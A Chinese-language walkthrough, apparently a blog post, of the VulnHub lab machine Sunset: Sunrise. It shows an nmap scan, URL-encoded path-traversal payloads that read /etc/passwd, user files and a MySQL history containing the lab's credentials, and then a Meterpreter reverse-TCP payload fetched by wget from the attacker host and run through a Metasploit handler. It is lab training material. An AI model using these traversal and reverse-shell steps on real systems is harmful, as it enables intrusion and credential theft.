仅供个人娱乐

靶机信息

https://www.vulnhub.com/entry/sunset-sunrise,406/

一、主机探测

Sunset靶机

二、信息收集

nmap -sS -sV -T5 -A -p-

Sunset靶机
Sunset靶机

http://192.168.174.132:8080/

Sunset靶机
Sunset靶机
Sunset靶机
Sunset靶机

三、漏洞利用

构造poc

http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Sunset靶机

http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

Sunset靶机

http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f

Sunset靶机

http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt

Sunset靶机

http://192.168.174.132:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history

Sunset靶机

weborf/iheartrainbows44

Sunset靶机
Sunset靶机

sunrise    thefutureissobrightigottawearshades

root          *C7B6683EEB8FF8329D8390574FAA04DD04B87C58

Sunset靶机
Sunset靶机

以root执行wine命令,wine可以执行exe程序

msfpc windows 192.168.174.128

Sunset靶机

python -m SimpleHTTPServer 8888

use exploit/multi/handler

set encoder x86/shikata_ga_nai

set lhost 192.168.174.132

set lport 443

run

wget http://192.168.174.128:8888/windows-meterpreter-staged-reverse-tcp-443.exe

Sunset靶机

相关文章:

  • 2021-12-28
  • 2021-09-18
  • 2021-07-16
  • 2021-07-21
  • 2021-10-31
  • 2021-07-03
  • 2021-07-21
  • 2021-05-12
猜你喜欢
  • 2021-11-12
  • 2021-07-05
  • 2022-12-23
  • 2021-07-21
  • 2021-06-27
相关资源
相似解决方案